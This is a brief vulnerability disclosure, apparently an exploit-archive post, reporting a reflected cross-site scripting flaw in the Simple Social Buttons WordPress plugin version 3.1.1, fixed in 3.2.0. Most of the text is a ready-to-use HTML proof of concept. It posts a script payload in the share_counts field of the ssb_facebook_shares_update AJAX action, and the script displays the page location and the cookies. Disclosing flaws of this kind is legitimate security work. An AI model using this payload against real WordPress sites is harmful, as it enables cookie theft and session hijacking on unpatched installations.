The WordPress plugin Simple Social Buttons version 3.1.1 (a.k.a. Simple Social Media Share Buttons) suffers from a reflected cross-site scripting vulnerability found by Mr.F. It was fixed in version 3.2.0:

https://wordpress.org/plugins/simple-social-buttons/#developers

HTML POC:


<!DOCTYPE html>
<html>
<head>
<title>xss poc</title>
</head>
<body>
<form method="post" action="http://the.host.name/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="ssb_facebook_shares_update" />
<input type="text" name="share_counts" value="-17&lt;script&gt;alert(document.location);alert(document.cookie);&lt;/script&gt;" />
<input type="text" name="post_id" value="1337" />
<input type="submit" value="Submit!" />
</form>
</body>
</html>